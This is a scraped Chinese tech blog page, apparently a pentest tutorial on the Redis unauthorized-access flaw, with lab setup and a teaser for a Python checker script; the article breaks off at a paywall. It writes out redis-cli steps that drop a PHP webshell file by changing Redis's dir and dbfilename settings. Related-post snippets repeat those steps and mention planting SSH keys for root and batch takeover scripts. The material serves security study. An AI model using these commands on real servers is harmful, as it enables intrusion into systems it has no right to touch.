python漏洞利用脚本_Redis 未授权访问漏洞(附Python脚本)

最新推荐文章于 2022-12-16 16:14:16 发布
最新推荐文章于 2022-12-16 16:14:16 发布
阅读量556 收藏
点赞数
文章标签: python漏洞利用脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39590635/article/details/111454648
版权
本文介绍了Redis未授权访问漏洞的环境搭建、测试方法和利用过程,包括通过Python脚本自动化测试是否存在未授权访问和弱口令。同时提供了安全解决方案,如绑定IP和设置密码。
摘要由CSDN通过智能技术生成

0x01 环境搭建

#下载并安装

cd/tmp

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

tar xzf redis-2.8.17.tar.gz

cd redis-2.8.17make

#启动redis服务

cd src

./redis-server

启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。 比如:

root@kali:/tmp/redis-2.8.17/src# ./redis-cli -h 192.168.125.140

192.168.125.140:6379>ping

PONG192.168.125.140:6379>

0x02 未授权访问漏洞测试

使用redis客户端直接无账号成功登录redis:

从登录的结果可以看出该redis服务对公网开放,且未启用认证。

利用redis写webshell

利用前提:

1.redis未授权 能redis-cli连上

2.开了web并且知道路径(如利用phpinfo)

我们可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件:

config set dir /home/wwwroot/default/configsetdbfilename redis.phpset webshell "<?php phpinfo(); ?>

最低0.47元/天 解锁文章
weixin_39590635
关注
Python输入漏洞利用Python input漏洞
墨痕诉清风的博客
08-31 707
Python输入漏洞利用(input)
python脚本实现Redis授权批量提权
fengxueersui的博客
04-20 325
这篇文章主要给大家介绍了关于利用python脚本实现redis授权批量提权的相关资料,文中通过示例代码介绍的非常详细安装依赖sudo easy_install redis使用redis python hackredis.py usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT] ...
python Redis授权访问
小小猪的博客
12-23 1345
python Redis授权访问 漏洞简介: 简单来说,redis是一个数据库。在默认的配置下,redis绑定在0.0.0.0:6379,也就是说,如果服务器有公网ip,可以通过访问其公网ip的6379端口来操作redis。最为致命的是,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。 import socket import sys import getopt #输入不同指令不同功能 def banner(): print('欢迎来到
redis授权访问漏洞
ad12456的博客
05-12 2918
漏洞场景: Redis 4.x/5.x 授权访问漏洞: 因配置不当可以授权访问,攻击者无需认证就可以访问到内部数据,其漏洞可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据,攻击者还可通过 EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接免密码登录服务器。 还能被利用去挖矿。 Redias: Redis的常见数据类型: ①: String:字符和整型。 缓存、分布式session、分布式锁、全局ID
PythonPython检测是否有访问权限
weixin_30367543的博客
03-29 466
本文参照菜鸟教程,练习使用并动手改写了某些方法,仅供自己学习,如需详细了解请跳转菜鸟教程:http://www.runoob.com/python3/python3-os-file-methods.html 检验权限模式 os.access(path,mode) 参数: path --要用来检测是否有访问权限的路径。 mode --常用4种模式如下: os.F_O...
Redis授权访问漏洞的利用
weixin_45983744的博客
12-09 194
web渗透学习交流群:811401950 利用redis写webshell 在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到...
Python库 | proxy_pool_redis-0.0.7.tar.gz
03-09
Python库proxy_pool_redis-0.0.7:利用Redis构建高效代理池》 在现代互联网应用中,尤其是在网络爬虫、自动化测试等领域,代理IP的使用变得日益重要。代理池(Proxy Pool)是一种管理代理IP资源的有效方式,它...
Python库 | guillotina_rediscache-1.0.9-py3-none-any.whl
02-17
Python库Guillotina RedisCache详解》 在Python的世界里,高效的缓存管理是提升应用程序性能的关键之一。本文将详细介绍Guillotina RedisCache,一个专为Guillotina框架设计的Redis缓存库,版本号为1.0.9。这个库...
(白帽子学习笔记)授权访问漏洞——redis环境搭建
冬的博客
08-26 416
读者需知 1、本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2、本文参考了一些文章,如有侵权请联系本人删除 靶机:centos7 攻击机:kali 一、centos中的redis安装 1、创建redis文件夹 2、将压缩包转存到已经提前创建好的/home/redis/对应目录下 3、解压压缩包 tar zxf redis-5.0.6.tar.gz 4、进入对应目录下,对文件进行编译 <1>首先先搭建c编译环境.
python漏洞利用脚本_MS15-034 Python脚本漏洞检测
weixin_39939661的博客
12-18 376
import requests代码区域print(" =================================================")print(" ")print(" MS15-034 漏洞 CheckList(WEB安全...
因为在此系统上禁止运行脚本_利用Python脚本实现漏洞情报监控与通知的经验分享...
weixin_39710561的博客
12-04 253
前言本文主要介绍了笔者利用一个简单的Python脚本实现漏洞情报的监控以及自动通报的相关经验。一、背景笔者所在公司某一个业务系统用到了漏洞频发的Struts2框架,S2-045爆发的时候刚好是刚进公司不久,还没有落实好漏洞通报排查工作,因此该业务系统的服务器就因为这个漏洞沦陷了,后续又接连出了好几个RCE漏洞,好在及时发布了预警和响应排查,没有受到影响。鉴于S2的漏洞频繁爆发,且动不动就...
redis-monitor.py
vbaspdelphi的专栏
10-12 1484
转载git代码: https://github.com/iambocai/falcon-monit-scripts/blob/master/redis/redis-monitor.py#!/bin/env python #-*- coding:utf-8 -*-__author__ = 'iambocai'import json import time import socket import os
错误:except Exception,e: ^ SyntaxError: invalid syntax
热门推荐
qq_41239950的博客
02-15 1万+
运行代码时出现以下错误: except Exception,e: ^ SyntaxError: invalid syntax 原因:python2和python3的语法区别 建议:将代码(python2) except Exception,e: 改为以下形式(python3) except Exception as e: 依...
python编程_Python异常机制try: 代码段 except 异常类型,e: 异常处理代码段,如果不知道异常类型,可以使用try: 代码段 except Except,e:异常处理代码段;Ex
weixin_36230578的博客
03-26 1115
一个Python异常实例   一个简单的异常例子,打开一个不存在的文件,引发异常: #!/usr/local/bin/python3.2 try: f = open("file-not-exists", "r") except IOError,e: print("open exception: %s: %s\n" %(e.errno, e.stre
CVE-2019-9740 Python urllib CRLF注入漏洞复现
afei001
01-10 906
目录 1.CRLF注入介绍 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Python 3.7.2中的urllib 5.2 Python 2.7.16中的urllib2 5.3 攻击场景 6.漏洞修复 1.CRLF注入介绍 CRLF注入漏洞,是由于Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。攻击者一旦向请求行或首部中的字段注入恶意的CRLF,就能注入一些首部字段或报文主体,并在响应中输出,所以又称为HTTP响应拆分漏洞(HTTP ...
Python urllib CRLF注入漏洞小结
HWHXY的博客
12-16 681
URLLIB 系列CRLF注入漏洞
python脚本实现导出redis集群的key以及value值并输出至文件
最新发布
08-30
然后,编写Python脚本实现导出Redis集群的key以及value值,并输出至文件,具体代码如下: ```python import redis def export_redis_data(redis_cluster, output_file): with open(output_file, 'w') as file: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值